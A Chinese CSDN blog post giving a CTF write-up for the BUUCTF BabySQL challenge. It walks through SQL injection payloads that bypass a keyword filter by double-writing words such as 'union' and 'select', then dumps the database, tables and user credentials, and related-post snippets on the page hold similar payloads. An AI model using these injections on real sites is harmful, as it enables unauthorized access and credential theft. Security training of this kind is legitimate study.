BUUCTF [极客大挑战 2019] BabySQL

最新推荐文章于 2023-01-05 15:15:13 发布
最新推荐文章于 2023-01-05 15:15:13 发布
阅读量192 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51936244/article/details/112756743
版权

BUUCTF [极客大挑战 2019] BabySQL

打开环境
在这里插入图片描述
尝试万能密码登录

1' or 1=1#

在这里插入图片描述
根据报错信息,关键字or被屏蔽,尝试双写绕过

1' oorr 1=1#

在这里插入图片描述
查询字段数

/check.php?username=1' uniunionon selselectect 1,2,3,4 %23
&password=1

在这里插入图片描述
判断字段数为3,查询回显点位:

/check.php?username=1' uniunionon selselectect 1,2,3 %23
&password=1

在这里插入图片描述
回显点位为2和3,
查询当前数据库名:

/check.php?username=1' ununionion seselectlect 1,2,database()  %23&password=1

在这里插入图片描述
查询表名:

/check.php?username=1' ununionion seselectlect 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables wherwheree table_schema=database() %23&password=1

在这里插入图片描述
获取b4bsql的内容:

/check.php?username=1' ununionion seselectlect 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wherwheree table_name='b4bsql' %23&password=1

在这里插入图片描述
查询username和password:

/check.php?username=1' uniunionon selselectect 11,22,group_concat(concat_ws(0x7e,username,passwoorrd)) frfromom geek.b4bsql %23
&password=1

在这里插入图片描述
得到flag,完成(‾◡◝)

三 二 一 零
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 379
BUUCTF的[极客挑战 2019]BabySQL 1
buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 947
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
BUUCTF:[极客挑战 2019]BabySQL 1
羽的博客
07-22 286
输入: 1' 1 判断是单引号注入 输入: 1' order by 1# 1 发现过滤了or,by 尝试双写注入 输入: 1' oorrder bbyy 4# 1 是四列 输入: 1' ununionion seselectlect 1,database(),3# 1 输入: 1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema...
BUUCTF-[极客挑战 2019]BabySQL 1
ITgougou_的博客
12-19 257
题目考察了字符绕过,注释符绕过,sql双写绕过 http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 order by 3%23&password=admin . 可以看到or和by关键字被过滤 尝试双写绕过 http://7738142d-0bba-4e...
040统计数字字符的个数
qq_44588905的博客
11-08 373
统计数字字符的个数 描述 输入一行字符,统计出其中数字字符的个数。 输入 一行字符串,总长度不超过255。 输出 输出为1行,输出字符串里面数字字符的个数。 样例输入 Peking University is set up at 1898. 样例输出 4 具体代码 #include <iostream> #include <cstring> #include <cstdio> using namespace std; int main() { char sen[25
BUUCTF[极客挑战 2019]EasySQL
楼阁de猫的博客
09-25 385
打开网址发现是一个登录网站,但是没有注册功能 我么先输入一个用户名admin,再输入密码用单引号闭合1’试看,发现报错了,应该是字符型注入 先使用万能密码登录,用户名随便输入,万能密码 1’or’1’='1 果然得到了flag 最后再补充一下万能密码有哪些 ...
BUUCTF】[极客挑战 2019]EasySQL
algae
06-23 423
flag{6b3f3969-e5bf-44a2-8eb6-f82383406247}
BUUCTF-Web】[极客挑战 2019]BabySQL
weixin_49298681的博客
01-05 272
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
BUUCTF-WEB
ccfly1012的博客
11-02 3860
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-WriteUp
鱼的博客
02-01 736
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
BUUCTF [极客挑战 2019]HardSQL
CrotZZ的博客
07-08 224
尝试万能密码被逮住 1’ or 1=1# 经过一系列尝试 order by,union select之类的都被过滤 网上别人的write参考了一下,这里是报错注入,用到xpath语法错误中extractvalue ^表异或,这里or and都被过滤了包括替换成&& ||我也试过也不行。 网上了解了下报错注入,这题目extractvalue里select后要加括号(比如下面database()外面加了括号),而正常情况下是不用的,猜测是空格被过滤的原因。 check.php?username
BUUCTF Web[极客挑战 2019]EasySQL
hao2580的博客
01-28 2719
打开链接 直接万能密码登入 得·flag
BUUCTF [极客挑战 2019]FinalSQL
CyhDl666的博客
03-09 334
12345都点过了 访问id=6 提示 Clever! But not this table. 这里猜测id这里存在SQL注入,而不是以前的登录框 初步判断了一下,是一个数字型注入 且过滤了一些字符 需要fuzz一下 空格被过滤掉了用() union注入这些也被过滤的差不都了 FinalSQL可以想想到应该是盲注类型的题目 嘿嘿嘿 ^没有被过滤 可以在这里去搞点事情做做 题目有提示是盲注 所以这种题目还是跑脚本 import requests import sys import time def g.
BUUCTF:[极客挑战 2019]EasySQL
末初的CSDN博客
10-06 1047
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]EasySQL 登录框,尝试了一下万能密码直接得到flag Seanz7' or '1'='1 PS:用户框和密码框都需要万能密码,可能用户名验证和密码验证没有在一条sql语句中 ...
BUUCTF 极客挑战easysql1
m0_52598783的博客
11-27 230
进入页面以后尝试注入 发现存在sql注入 开始寻找注入点 发现注入点为3 然后用万能密码试了一下 admin’ or ‘1’='1 然后 然后 … flag就来了
BUUCTF闯关日记--[极客挑战 2019]HardSQL1
qq_64201116的博客
05-17 508
以后遇到sql注入,我觉得应该先判断他过滤了什么东西,比如比较重要的 第一个:空格 第二个:and,or,select,#,--+ 第三个:'(单引号)和"(双引号) 第四个:注入使用的函数(可以挑你比较喜欢的顺手的或者简单的函数优先): sleep,if(布尔盲注) updatexml,concat(报错注入) order by,union(显错注入) load_file(DNS注入) 当然了还有一些database()等等,把你要走的路先测试一遍再进行渗透 否则你走到最
BUUCTF[极客挑战 2019]LoveSQL
楼阁de猫的博客
12-17 263
[极客挑战 2019]LoveSQL 用admin登录一下,发现用户名错误,那试一下admin’# 发现登陆成功,看到这一串数字以为有什么特别的,其实没啥用 但是能看到空格和#都是被url编码了的,这样才能有正确的回显,因此接下来的操作应该都是要对字符进行url编码的 接下来我们用SQL注入来做 1.首先查询字段数 check.php?username=admin' order by 4%23&password=111 (因为url没有自动对#进行编码,所以我们要手动输入#的url编码%23,
buuctf 极客挑战 lovesql
SopRomeo的博客
01-17 3543
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2767
题目预备知识 mysql查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
buuctf 极客挑战2019php
最新发布
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值